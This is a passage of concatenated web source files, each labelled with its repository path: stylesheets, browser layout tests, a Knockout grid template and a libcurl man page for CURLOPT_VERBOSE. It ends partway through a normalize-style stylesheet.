/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:72 */
.x-tabbar.x-docked-top .x-tab {
-webkit-border-radius: 0;
-moz-border-radius: 0;
-ms-border-radius: 0;
-o-border-radius: 0;
border-radius: 0;
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
min-width: 3.3em;
height: inherit;
background-color: transparent;
border: 0;
padding: 3px;
margin: 0;
border: 1px solid #107bfb;
color: #fff;
padding: 7px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:85 */
.x-tabbar.x-docked-top .x-tab .x-button-label,
.x-tabbar.x-docked-top .x-tab .x-badge {
color: #157efb;
font-size: .8em;
line-height: 1;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:91 */
.x-tabbar.x-docked-top .x-tab.x-tab-active {
background-color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:93 */
.x-tabbar.x-docked-top .x-tab.x-tab-active .x-button-label,
.x-tabbar.x-docked-top .x-tab.x-tab-active .x-badge {
color: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:98 */
.x-tabbar.x-docked-top .x-tab .x-button-icon::before {
display: none;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:102 */
.x-tabbar.x-docked-top .x-tab:first-child {
border-radius: 4px 0px 0px 4px;
border-right: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:107 */
.x-tabbar.x-docked-top .x-tab:last-child {
border-radius: 0px 4px 4px 0px;
border-left: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/tab/Panel.scss:112 */
.x-tabbar.x-docked-top .x-tab .x-button-icon.x-hidden {
display: none;
}
|
mobile/catalog/view/theme/new/stylesheet/ie7.css
|
atpshxc/shcoyee
|
/* God I hate Microsoft! */
#header #cart {
width: 400px;
}
#header #cart .heading {
position: relative;
right: 172px;
margin-right: 0px;
}
#header #cart .content {
}
.success, .warning, .attention, .information {
position: relative;
}
.success .close, .warning .close, .attention .close, .information .close {
position: absolute;
right: 10px;
}
.button{
min-width:45px!important;
}
.ym-g25{ width:24.9%; }
|
wiki/resources/src/jquery.tipsy/jquery.tipsy.css
|
Electro-Light/ElectroLight-WebSite
|
.tipsy {
padding: 5px;
position: absolute;
z-index: 100000;
cursor: default;
}
.tipsy-inner {
padding: 5px 8px 4px 8px;
/*background-color: #e8f2f8;*/
background-color: #fff;
border: solid 1px #a7d7f9;
color: #000;
max-width: 15em;
border-radius: 4px;
/*
-moz-box-shadow: 0px 2px 8px #cccccc;
-webkit-box-shadow: 0px 2px 8px #cccccc;
box-shadow: 0px 2px 8px #cccccc;
-ms-filter: "progid:DXImageTransform.Microsoft.DropShadow(OffX=0, OffY=2, Strength=6, Direction=90, Color='#cccccc')";
filter: progid:DXImageTransform.Microsoft.DropShadow(OffX=0, OffY=2, Strength=6, Direction=90, Color='#cccccc');
*/
}
.tipsy-arrow {
position: absolute;
/* @embed */
background: url( images/tipsy.png ) no-repeat top left;
width: 11px;
height: 6px;
}
/* @noflip */ .tipsy-n .tipsy-arrow {
top: 0;
left: 50%;
margin-left: -5px;
}
/* @noflip */ .tipsy-nw .tipsy-arrow {
top: 0;
left: 10px;
}
/* @noflip */ .tipsy-ne .tipsy-arrow {
top: 0;
right: 10px;
}
/* @noflip */ .tipsy-s .tipsy-arrow {
bottom: 0;
left: 50%;
margin-left: -5px;
background-position: bottom left;
}
/* @noflip */ .tipsy-sw .tipsy-arrow {
bottom: 0;
left: 10px;
background-position: bottom left;
}
/* @noflip */ .tipsy-se .tipsy-arrow {
bottom: 0;
right: 10px;
background-position: bottom left;
}
/* @noflip */ .tipsy-e .tipsy-arrow {
top: 50%;
margin-top: -5px;
right: 0;
width: 6px;
height: 11px;
background-position: top right;
}
/* @noflip */ .tipsy-w .tipsy-arrow {
top: 50%;
margin-top: -5px;
left: 0;
width: 6px;
height: 11px;
}
|
tests/wpt/web-platform-tests/resources/test/tests/unit/async-test-return-restrictions.html
|
asajeffrey/servo
|
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<script src="/resources/testharness.js"></script>
<title>Restrictions on return value from `async_test`</title>
</head>
<body>
<script>
function makeTest(...bodies) {
const closeScript = '<' + '/script>';
let src = `
<!DOCTYPE HTML>
<html>
<head>
<title>Document title</title>
<script src="/resources/testharness.js?${Math.random()}">${closeScript}
</head>
<body>
<div id="log"></div>`;
bodies.forEach((body) => {
src += '<script>(' + body + ')();' + closeScript;
});
const iframe = document.createElement('iframe');
document.body.appendChild(iframe);
iframe.contentDocument.write(src);
return new Promise((resolve) => {
window.addEventListener('message', function onMessage(e) {
if (e.source !== iframe.contentWindow) {
return;
}
if (!e.data || e.data.type !=='complete') {
return;
}
window.removeEventListener('message', onMessage);
resolve(e.data);
});
iframe.contentDocument.close();
}).then(({ tests, status }) => {
const summary = {
harness: {
status: getEnumProp(status, status.status),
message: status.message
},
tests: {}
};
tests.forEach((test) => {
summary.tests[test.name] = getEnumProp(test, test.status);
});
return summary;
});
}
function getEnumProp(object, value) {
for (let property in object) {
if (!/^[A-Z]+$/.test(property)) {
continue;
}
if (object[property] === value) {
return property;
}
}
}
promise_test(() => {
return makeTest(
() => {
async_test((t) => {t.done(); return undefined;}, 'before');
async_test((t) => {t.done(); return null;}, 'null');
async_test((t) => {t.done(); return undefined;}, 'after');
}
).then(({harness, tests}) => {
assert_equals(harness.status, 'ERROR');
assert_equals(
harness.message,
'Test named "null" passed a function to `async_test` that returned a value.'
);
assert_equals(tests.before, 'PASS');
assert_equals(tests.null, 'PASS');
// This test did not get the chance to start.
assert_equals(tests.after, undefined);
});
}, 'test returning `null`');
promise_test(() => {
return makeTest(
() => {
async_test((t) => {t.done(); return undefined;}, 'before');
async_test((t) => {t.done(); return {};}, 'object');
async_test((t) => {t.done(); return undefined;}, 'after');
}
).then(({harness, tests}) => {
assert_equals(harness.status, 'ERROR');
assert_equals(
harness.message,
'Test named "object" passed a function to `async_test` that returned a value.'
);
assert_equals(tests.before, 'PASS');
assert_equals(tests.object, 'PASS');
// This test did not get the chance to start.
assert_equals(tests.after, undefined);
});
}, 'test returning an ordinary object');
promise_test(() => {
return makeTest(
() => {
async_test((t) => {t.done(); return undefined;}, 'before');
async_test((t) => {t.done(); return Promise.resolve(5);}, 'thenable');
async_test((t) => {t.done(); return undefined;}, 'after');
}
).then(({harness, tests}) => {
assert_equals(harness.status, 'ERROR');
assert_equals(
harness.message,
'Test named "thenable" passed a function to `async_test` that returned a value. ' +
'Consider using `promise_test` instead when using Promises or async/await.'
);
assert_equals(tests.before, 'PASS');
assert_equals(tests.thenable, 'PASS');
// This test did not get a chance to start.
assert_equals(tests.after, undefined);
});
}, 'test returning a thenable object');
</script>
</body>
</html>
|
src/vendor/bootstrap/css/bootstrap-reboot.css
|
dennismoon/ng-mdbootstrap
|
html {
-webkit-box-sizing: border-box;
box-sizing: border-box;
font-family: sans-serif;
line-height: 1.15;
-ms-text-size-adjust: 100%;
-webkit-text-size-adjust: 100%;
-ms-overflow-style: scrollbar;
-webkit-tap-highlight-color: transparent;
}
*,
*::before,
*::after {
-webkit-box-sizing: inherit;
box-sizing: inherit;
}
@-ms-viewport {
width: device-width;
}
body {
margin: 0;
font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
font-size: 1rem;
font-weight: normal;
line-height: 1.5;
color: #292b2c;
background-color: #fff;
}
[tabindex="-1"]:focus {
outline: none !important;
}
hr {
-webkit-box-sizing: content-box;
box-sizing: content-box;
height: 0;
overflow: visible;
}
h1, h2, h3, h4, h5, h6 {
margin-top: 0;
margin-bottom: .5rem;
}
p {
margin-top: 0;
margin-bottom: 1rem;
}
abbr[title],
abbr[data-original-title] {
text-decoration: underline;
text-decoration: underline dotted;
cursor: help;
border-bottom: 0;
}
address {
margin-bottom: 1rem;
font-style: normal;
line-height: inherit;
}
ol,
ul,
dl {
margin-top: 0;
margin-bottom: 1rem;
}
ol ol,
ul ul,
ol ul,
ul ol {
margin-bottom: 0;
}
dt {
font-weight: bold;
}
dd {
margin-bottom: .5rem;
margin-left: 0;
}
blockquote {
margin: 0 0 1rem;
}
dfn {
font-style: italic;
}
b,
strong {
font-weight: bolder;
}
small {
font-size: 80%;
}
sub,
sup {
position: relative;
font-size: 75%;
line-height: 0;
vertical-align: baseline;
}
sub {
bottom: -.25em;
}
sup {
top: -.5em;
}
a {
color: #0275d8;
text-decoration: none;
background-color: transparent;
-webkit-text-decoration-skip: objects;
}
a:hover {
color: #014c8c;
text-decoration: underline;
}
a:not([href]):not([tabindex]) {
color: inherit;
text-decoration: none;
}
a:not([href]):not([tabindex]):focus, a:not([href]):not([tabindex]):hover {
color: inherit;
text-decoration: none;
}
a:not([href]):not([tabindex]):focus {
outline: 0;
}
pre,
code,
kbd,
samp {
font-family: monospace, monospace;
font-size: 1em;
}
pre {
margin-top: 0;
margin-bottom: 1rem;
overflow: auto;
}
figure {
margin: 0 0 1rem;
}
img {
vertical-align: middle;
border-style: none;
}
svg:not(:root) {
overflow: hidden;
}
a,
area,
button,
[role="button"],
input,
label,
select,
summary,
textarea {
-ms-touch-action: manipulation;
touch-action: manipulation;
}
table {
border-collapse: collapse;
}
caption {
padding-top: 0.75rem;
padding-bottom: 0.75rem;
color: #636c72;
text-align: left;
caption-side: bottom;
}
th {
text-align: left;
}
label {
display: inline-block;
margin-bottom: .5rem;
}
button:focus {
outline: 1px dotted;
outline: 5px auto -webkit-focus-ring-color;
}
input,
button,
select,
optgroup,
textarea {
margin: 0;
font-family: inherit;
font-size: inherit;
line-height: inherit;
}
button,
input {
overflow: visible;
}
button,
select {
text-transform: none;
}
button,
html [type="button"],
[type="reset"],
[type="submit"] {
-webkit-appearance: button;
}
button::-moz-focus-inner,
[type="button"]::-moz-focus-inner,
[type="reset"]::-moz-focus-inner,
[type="submit"]::-moz-focus-inner {
padding: 0;
border-style: none;
}
input[type="radio"],
input[type="checkbox"] {
-webkit-box-sizing: border-box;
box-sizing: border-box;
padding: 0;
}
input[type="radio"]:disabled,
input[type="checkbox"]:disabled {
cursor: not-allowed;
}
input[type="date"],
input[type="time"],
input[type="datetime-local"],
input[type="month"] {
-webkit-appearance: listbox;
}
textarea {
overflow: auto;
resize: vertical;
}
fieldset {
min-width: 0;
padding: 0;
margin: 0;
border: 0;
}
legend {
display: block;
width: 100%;
max-width: 100%;
padding: 0;
margin-bottom: .5rem;
font-size: 1.5rem;
line-height: inherit;
color: inherit;
white-space: normal;
}
progress {
vertical-align: baseline;
}
[type="number"]::-webkit-inner-spin-button,
[type="number"]::-webkit-outer-spin-button {
height: auto;
}
[type="search"] {
outline-offset: -2px;
-webkit-appearance: none;
}
[type="search"]::-webkit-search-cancel-button,
[type="search"]::-webkit-search-decoration {
-webkit-appearance: none;
}
::-webkit-file-upload-button {
font: inherit;
-webkit-appearance: button;
}
output {
display: inline-block;
}
summary {
display: list-item;
}
template {
display: none;
}
[hidden] {
display: none !important;
}
/*# sourceMappingURL=bootstrap-reboot.css.map */
|
v7.38.0/docs/libcurl/opts/CURLOPT_VERBOSE.html
|
iSCInc/cURL
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>CURLOPT_VERBOSE man page</title>
<meta name="generator" content="roffit">
<STYLE type="text/css">
P.level0 {
padding-left: 2em;
}
P.level1 {
padding-left: 4em;
}
P.level2 {
padding-left: 6em;
}
span.emphasis {
font-style: italic;
}
span.bold {
font-weight: bold;
}
span.manpage {
font-weight: bold;
}
h2.nroffsh {
background-color: #e0e0e0;
}
span.nroffip {
font-weight: bold;
font-size: 120%;
font-family: monospace;
}
p.roffit {
text-align: center;
font-size: 80%;
}
</STYLE>
</head><body>
<p class="level0"><a name="NAME"></a><h2 class="nroffsh">NAME</h2>
<p class="level0">CURLOPT_VERBOSE - set verbose mode on/off <a name="SYNOPSIS"></a><h2 class="nroffsh">SYNOPSIS</h2>
<p class="level0">#include <curl/curl.h>
<p class="level0">CURLcode curl_easy_setopt(CURL *handle, CURLOPT_VERBOSE, long onoff); <a name="DESCRIPTION"></a><h2 class="nroffsh">DESCRIPTION</h2>
<p class="level0">Set the <span Class="emphasis">onoff</span> parameter to 1 to make the library display a lot of verbose information about its operations on this <span Class="emphasis">handle</span>. Very useful for libcurl and/or protocol debugging and understanding. The verbose information will be sent to stderr, or the stream set with <a Class="emphasis" href="./CURLOPT_STDERR.html">CURLOPT_STDERR</a>.
<p class="level0">You hardly ever want this set in production use, you will almost always want this when you debug/report problems.
<p class="level0">To also get all the protocol data sent and received, consider using the <a Class="emphasis" href="./CURLOPT_DEBUGFUNCTION.html">CURLOPT_DEBUGFUNCTION</a>. <a name="DEFAULT"></a><h2 class="nroffsh">DEFAULT</h2>
<p class="level0">0, meaning disabled. <a name="RETURN"></a><h2 class="nroffsh">RETURN VALUE</h2>
<p class="level0">Returns CURLE_OK. <a name="SEE"></a><h2 class="nroffsh">SEE ALSO</h2>
<p class="level0"><a Class="manpage" href="./CURLOPT_STDERR.html">CURLOPT_STDERR</a> <a Class="manpage" href="./CURLOPT_DEBUGFUNCTION.html">CURLOPT_DEBUGFUNCTION</a> <span Class="manpage"> </span> <p class="roffit">
This HTML page was made with <a href="http://daniel.haxx.se/projects/roffit/">roffit</a>.
</body></html>
|
wp-content/themes/hi-response-single/inc/wp-sass/phpsass/tests/mixin-content.css
|
benlimdesign/benlimdesign
|
#logo {
background-image: url("/images/logo.png"); }
* html #logo {
background-image: url("/images/logo.gif"); }
|
plugins-dist/compresseur/tests/css/expected_more_screen.css
|
phenix-factory/fci-obedience
|
@media screen {
.markItUpHeader{text-align:left}
.float-l{float:left}
.form-suggest{height:200px;background:#DEE2D0;vertical-align:top}
.form-input input{font-size:10px}
}
@media print {
.hide{display:none}
}
@media screen {
.form-input textarea{font-size:11px;width:350px}
.form-label{font-size:10px;font-weight:700;line-height:25px;padding-right:10px;text-align:right;width:100px;color:#39738F}
.font-9{font-size:9px}
.form-topic{font-weight:700}
.form-error{color:red}
.inline{display:inline}
.space-10{clear:both;font-size:10px;height:10px;line-height:10px}
.suggest-success{color:green;padding-left:10px;font-size:11px;font-weight:700}
.top{vertical-align:top}
table td{padding:3px}
a:link,a:active,a:visited,a.postlink{color:#069;text-decoration:none}
a:hover{color:#DD6900}
a.admin:hover,a.mod:hover{color:#DD6900}
a.but,a.but:hover,a.but:visited{color:#000;text-decoration:none}
a.topictitle:visited{color:#5493B4}
a.topictitle:hover{color:#DD6900}
body{color:#000;font:11px Verdana,Arial,Helvetica,sans-serif;margin:0 10px 10px;padding:0;overflow:auto}
font,th,td,p{font:12px Verdana,Arial,Helvetica,sans-serif}
form{display:inline}
hr{border:0 solid #FFF;border-top-width:1px;height:0}
img{border:0 solid}
input{font:11px Verdana,Arial,Helvetica,sans-serif}
input.button,input.liteoption,.fakebut{background:#FAFAFA;border:1px solid #000;font-size:11px}
input.catbutton{background:#FAFAFA;border:1px solid #000;font-size:10px}
input.mainoption{background:#FAFAFA;border:1px solid #000;font-size:11px;font-weight:700}
input.post,textarea.post{background:#FFF;border:1px solid #000;font:11px Verdana,Arial,Helvetica,sans-serif;padding-bottom:2px;padding-left:2px}
select{background:#FFF;font:11px Verdana,Arial,Helvetica,sans-serif}
table{text-align:left}
td{vertical-align:middle}
td.cat{background-color:#C2C6BA;font-weight:700;height:20px;letter-spacing:1px;text-indent:4px}
td.genmed,.genmed{font-size:11px}
td.rowpic{background:#C2C6BA}
td.spacerow{background:#E5E6E2}
th{background-color:#FADD31;background-repeat:repeat-x;color:#68685E;font-size:11px;font-weight:700;line-height:16px;height:16px;padding-left:8px;padding-right:8px;text-align:center;white-space:nowrap}
.admin,.mod{font-size:11px;font-weight:700}
.admin,a.admin,a.admin:visited{color:#FFA34F}
.bodyline{background:#FFF;border:1px solid #98AAB1}
.center{text-align:center}
.code{background:#FAFAFA;border:1px solid #D1D7DC;color:#060;font:12px Courier,"Courier New",sans-serif;padding:5px}
.errorline{background:#E5E6E2;border:1px solid #8F8B8B;color:#D92A2A}
.explaintitle{color:#5C81B1;font-size:11px;font-weight:700}
.forumline{background:#FFF}
.gensmall{font-size:10px}
.h1-font{color:#069;display:inline;font:bold 13px Verdana,Arial,Helvetica,sans-serif;margin:.3em;text-decoration:none}
.h2-font{display:inline;font:11px Verdana,Arial,Helvetica,sans-serif}
.height1{height:1px}
.height22{height:22px}
.height25{height:25px}
.height28{height:28px}
.height30{height:30px}
.height40{height:40px}
.helpline{border:0 solid;font-size:10px}
.imgfolder{margin:1px 4px}
.imgspace{margin-left:1px;margin-right:2px}
.imgtopic,.imgicon{margin-left:3px}
.left{text-align:left}
.maintitle,h1,h2{color:#5C81B1;font:bold 20px/120% "Trebuchet MS",Verdana,Arial,Helvetica,sans-serif;text-decoration:none}
.maxwidth{width:100%}
.mod,a.mod,a.mod:visited{color:#060}
.name{font-size:11px;font-weight:700}
.nav{font-size:11px;font-weight:700}
.nowrap{white-space:nowrap}
.postbody{font-size:12px;line-height:125%}
.postbody a{text-decoration:underline}
.postdetails{color:#00396A;font-size:10px}
.quote{background:#F3F3EF;border:1px solid #C2C6BA;color:#069;font-size:11px;line-height:125%}
.right{text-align:right}
.row1{background:#F0F0EB}
.row2,.helpline{background:#E5E6E2}
.row3{background:#DBDBD4}
.subtitle,h2{font:bold 18px/180% "Trebuchet MS",Verdana,Arial,Helvetica,sans-serif;text-decoration:none}
.topictitle{color:#000;font-size:11px;font-weight:700}
.underline{text-decoration:underline}
.top{vertical-align:top}
.image-hspace{margin-right:3px}
.clear{clear:both}
.degrade{background-color:#777;background:-webkit-gradient(linear,left top,left bottom,from(#999),to(#666));background-image:-moz-linear-gradient(top,#999,#666);filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0,startColorstr='#999999',endColorstr='#666666');filter:progid:DXImageTransform.Microsoft.Shadow(color=#666666,direction=146,Strength=5);-ms-filter:"progid:DXImageTransform.Microsoft.gradient(GradientType=0,startColorstr='#999999',endColorstr='#666666')";filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0,startColorstr='#ff999999',endColorstr='#ff666666')}
}
@media print {
.degrade{background:none}
}
|
third_party/blink/web_tests/media/encrypted-media/encrypted-media-async-setcert-with-gc.html
|
scheib/chromium
|
<!DOCTYPE html>
<html>
<head>
<title>Test asynchronous setServerCertificate while running garbage collection</title>
<script src="encrypted-media-utils.js"></script>
<script src="../../resources/testharness.js"></script>
<script src="../../resources/testharnessreport.js"></script>
</head>
<body>
<script>
// Run garbage collection continuously.
setInterval(asyncGC, 0);
promise_test(function(test)
{
return navigator.requestMediaKeySystemAccess('org.w3.clearkey', getSimpleConfiguration()).then(function(access) {
return access.createMediaKeys();
}).then(function(mediaKeys) {
var cert = new Uint8Array(200);
return mediaKeys.setServerCertificate(cert);
}).then(function(result) {
assert_false(result);
});
}, 'Test asynchronous setServerCertificate while running garbage collection.');
</script>
</body>
</html>
|
third_party/blink/web_tests/printing/fixed-positioned-scrolled-expected.html
|
scheib/chromium
|
<!DOCTYPE html>
<style>
#myheader
{
position: fixed;
top: 20px;
}
</style>
<script>
function runTest()
{
if (window.testRunner)
testRunner.setPrinting();
}
</script>
<body onload="runTest()">
<div id="myheader">
<div align="center">
crbug.com/652449: Fixed-position object should be repeated on each page and positioned relative to top of page even when scrolled.
<hr/>
</div>
</div>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
<p>Filler lines</p>
</body>
|
test/fixtures/HTML Samples/app/ko/pagedGrid/simpleGrid.html
|
welldone-software/gulp-durandal
|
<div>
<table class="table table-striped" cellspacing="0 ">
<thead>
<tr data-bind="foreach: columns">
<th data-bind="text: headerText"></th>
</tr>
</thead>
<tbody class="table table-hover" data-bind="foreach: itemsOnCurrentPage">
<tr data-bind="foreach: $parent.columns">
<td data-bind="text: typeof rowText == 'function' ? rowText($parent) : $parent[rowText]"></td>
</tr>
</tbody>
</table>
<div class="pagination">
<ul>
<!-- ko foreach: ko.utils.range(0, maxPageIndex) -->
<li>
<a href="#" data-bind="text: $data + 1, click: function () { $root.currentPageIndex($data); }"></a>
</li>
<!-- /ko -->
</ul>
</div>
</div>
|
wp-content/themes/portfolio/node_modules/grunt-combine-media-queries/test/test3.css
|
alexsmander/alexmattorr
|
/* ==========================================================================
Normalize.scss settings
========================================================================== */
/**
* Includes legacy browser support IE6/7
*
* Set to false if you want to drop support for IE6 and IE7
*/
/* ==========================================================================
HTML5 display definitions
========================================================================== */
/*
* Corrects `block` display not defined in IE 8/9.
*/
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
nav,
section,
summary {
display: block; /* hello */
}
/**
* Correct `inline-block` display not defined in IE 6/7/8/9 and Firefox 3.
*/
audio,
canvas,
video {
display: inline-block;
}
/**
* Prevents modern browsers from displaying `audio` without controls.
* Remove excess height in iOS 5 devices.
*/
audio:not([controls]) {
display: none;
height: 0;
}
/**
* Address styling not present in IE 8/9.
*/
[hidden] {
display: none;
}
/* ==========================================================================
Base
========================================================================== */
/**
* 1. Set default font family to sans-serif.
* 2. Prevent iOS text size adjust after orientation change, without disabling
* 3.Corrects text resizing oddly in IE 6/7 when body `font-size` is set using
* `em` units.
*/
html {
font-family: sans-serif;
/* 1 */
-ms-text-size-adjust: 100%;
/* 2 */
-webkit-text-size-adjust: 100%;
/* 2 */
}
/**
* Remove default margin.
*/
body {
margin: 0;
}
/* ==========================================================================
Links
========================================================================== */
/**
* Address `outline` inconsistency between Chrome and other browsers.
*/
/**
* Improves readability when focused and also mouse hovered in all browsers.
*/
a:focus {
outline: thin dotted;
}
a:active,
a:hover {
outline: 0;
}
/* ==========================================================================
Typography
========================================================================== */
/**
* Addresses font sizes and margins set differently in IE 6/7.
* Address variable `h1` font-size and margin within `section` and `article`
* contexts in Firefox 4+, Safari 5, and Chrome.
*/
/**
* Address styling not present in IE 8/9, Safari 5, and Chrome.
*/
abbr[title] {
border-bottom: 1px dotted;
}
/**
* Address style set to `bolder` in Firefox 4+, Safari 5, and Chrome.
*/
b,
strong {
font-weight: bold;
}
/**
* Address styling not present in Safari 5 and Chrome.
*/
dfn {
font-style: italic;
}
/**
* Address differences between Firefox and other browsers.
*/
hr {
-moz-box-sizing: content-box;
box-sizing: content-box;
height: 0;
}
/**
* Addresses styling not present in IE 8/9.
*/
mark {
background: #ff0;
color: #000;
}
/**
* Addresses margins set differently in IE 6/7.
*/
/**
* Correct font family set oddly in Safari 5 and Chrome.
*/
code,
kbd,
pre,
samp {
font-family: monospace, serif;
font-size: 1em;
}
/**
* Improve readability of pre-formatted text in all browsers.
*/
pre {
white-space: pre-wrap;
}
/**
* Set consistent quote types.
*/
q {
quotes: "\201C" "\201D" "\2018" "\2019";
}
/**
* Address inconsistent and variable font size in all browsers.
*/
small {
font-size: 80%;
}
/**
* Prevent `sub` and `sup` affecting `line-height` in all browsers.
*/
sub,
sup {
font-size: 75%;
line-height: 0;
position: relative;
vertical-align: baseline;
}
sup {
top: -0.5em;
}
sub {
bottom: -0.25em;
}
/* ==========================================================================
Embedded content
========================================================================== */
/**
* 1. Remove border when inside `a` element in IE 8/9.
* 2. Improves image quality when scaled in IE 7.
*/
img {
border: 0;
}
/**
* Correct overflow displayed oddly in IE 9.
*/
svg:not(:root) {
overflow: hidden;
}
/* ==========================================================================
Figures
========================================================================== */
/**
* Address margin not present in IE 8/9 and Safari 5.
*/
figure {
margin: 0;
}
/* ==========================================================================
Forms
========================================================================== */
/**
* Define consistent border, margin, and padding.
*/
fieldset {
border: 1px solid #c0c0c0;
margin: 0 2px;
padding: 0.35em 0.625em 0.75em;
}
/**
* 1. Correct `color` not being inherited in IE 8/9.
* 2. Remove padding so people aren't caught out if they zero out fieldsets.
* 3. Corrects text not wrapping in Firefox 3.
* 4. Corrects alignment displayed oddly in IE 6/7.
*/
legend {
border: 0;
/* 1 */
padding: 0;
/* 2 */
}
/**
* 1. Correct font family not being inherited in all browsers.
* 2. Correct font size not being inherited in all browsers.
* 3. Address margins set differently in Firefox 4+, Safari 5, and Chrome.
* 4. Improves appearance and consistency in all browsers.
*/
button,
input,
select,
textarea {
font-family: inherit;
/* 1 */
font-size: 100%;
/* 2 */
margin: 0;
/* 3 */
}
/**
* Address Firefox 4+ setting `line-height` on `input` using `!important` in
* the UA stylesheet.
*/
button,
input {
line-height: normal;
}
/**
* Address inconsistent `text-transform` inheritance for `button` and `select`.
* All other form control elements do not inherit `text-transform` values.
* Correct `button` style inheritance in Chrome, Safari 5+, and IE 8+.
* Correct `select` style inheritance in Firefox 4+ and Opera.
*/
button,
select {
text-transform: none;
}
/**
* 1. Avoid the WebKit bug in Android 4.0.* where (2) destroys native `audio`
* and `video` controls.
* 2. Correct inability to style clickable `input` types in iOS.
* 3. Improve usability and consistency of cursor style between image-type
* `input` and others.
* 4. Removes inner spacing in IE 7 without affecting normal text inputs.
* Known issue: inner spacing remains in IE 6.
*/
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
-webkit-appearance: button;
/* 2 */
cursor: pointer;
/* 3 */
}
/**
* Re-set default cursor for disabled elements.
*/
button[disabled],
html input[disabled] {
cursor: default;
}
/**
* 1. Address box sizing set to `content-box` in IE 8/9.
* 2. Remove excess padding in IE 8/9.
* 3. Removes excess padding in IE 7.
* Known issue: excess padding remains in IE 6.
*/
input[type="checkbox"],
input[type="radio"] {
-moz-box-sizing: border-box;
box-sizing: border-box;
/* 1 */
padding: 0;
/* 2 */
}
/**
* 1. Address `appearance` set to `searchfield` in Safari 5 and Chrome.
* 2. Address `box-sizing` set to `border-box` in Safari 5 and Chrome
* (include `-moz` to future-proof).
*/
input[type="search"] {
-webkit-appearance: textfield;
/* 1 */
-moz-box-sizing: content-box;
/* 2 */
box-sizing: content-box;
}
/**
* Remove inner padding and search cancel button in Safari 5 and Chrome
* on OS X.
*/
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
-webkit-appearance: none;
}
/**
* Remove inner padding and border in Firefox 4+.
*/
button::-moz-focus-inner,
input::-moz-focus-inner {
border: 0;
padding: 0;
}
/**
* 1. Remove default vertical scrollbar in IE 8/9.
* 2. Improve readability and alignment in all browsers.
*/
textarea {
overflow: auto;
/* 1 */
vertical-align: top;
/* 2 */
}
/* ==========================================================================
Tables
========================================================================== */
/**
* Remove most spacing between table cells.
*/
table {
border-collapse: collapse;
border-spacing: 0;
}
/* Generated with FontPrep app http://fontprep.com/ */
@font-face {
font-family: 'AlternateGothic2 BT';
src: url("../fonts/alternate-gothic2.eot");
/* IE9 Compat Modes */
src: url("../fonts/alternate-gothic2.eot?#iefix") format("embedded-opentype"), url("../fonts/alternate-gothic2.woff") format("woff"), url("../fonts/alternate-gothic2.ttf") format("truetype"), url("../fonts/alternate-gothic2.svg#022c20d3c2b5208bc4ff771e4b5afcc9") format("svg");
/* Legacy iOS */
font-style: normal;
font-weight: 400;
}
/*
* Web Fonts from fontspring.com
*
* All OpenType features and all extended glyphs have been removed.
* Fully installable fonts can be purchased at http://www.fontspring.com
*
* The fonts included in this stylesheet are subject to the End User License you purchased
* from Fontspring. The fonts are protected under domestic and international trademark and
* copyright law. You are prohibited from modifying, reverse engineering, duplicating, or
* distributing this font software.
*
* (c) 2010-2012 Fontspring
*
*
*
*
* The fonts included are copyrighted by the vendor listed below.
*
* Vendor: exljbris Font Foundry
* License URL: http://www.fontspring.com/fflicense/exljbris
*
*
*/
@font-face {
font-family: 'museo_slab500';
src: url("../fonts/Museo_Slab_500_2-webfont.eot");
src: url("../fonts/Museo_Slab_500_2-webfont.eot?#iefix") format("embedded-opentype"), url("../fonts/Museo_Slab_500_2-webfont.woff") format("woff"), url("../fonts/Museo_Slab_500_2-webfont.ttf") format("truetype"), url("../fonts/Museo_Slab_500_2-webfont.svg#museo_slab500") format("svg");
font-weight: normal;
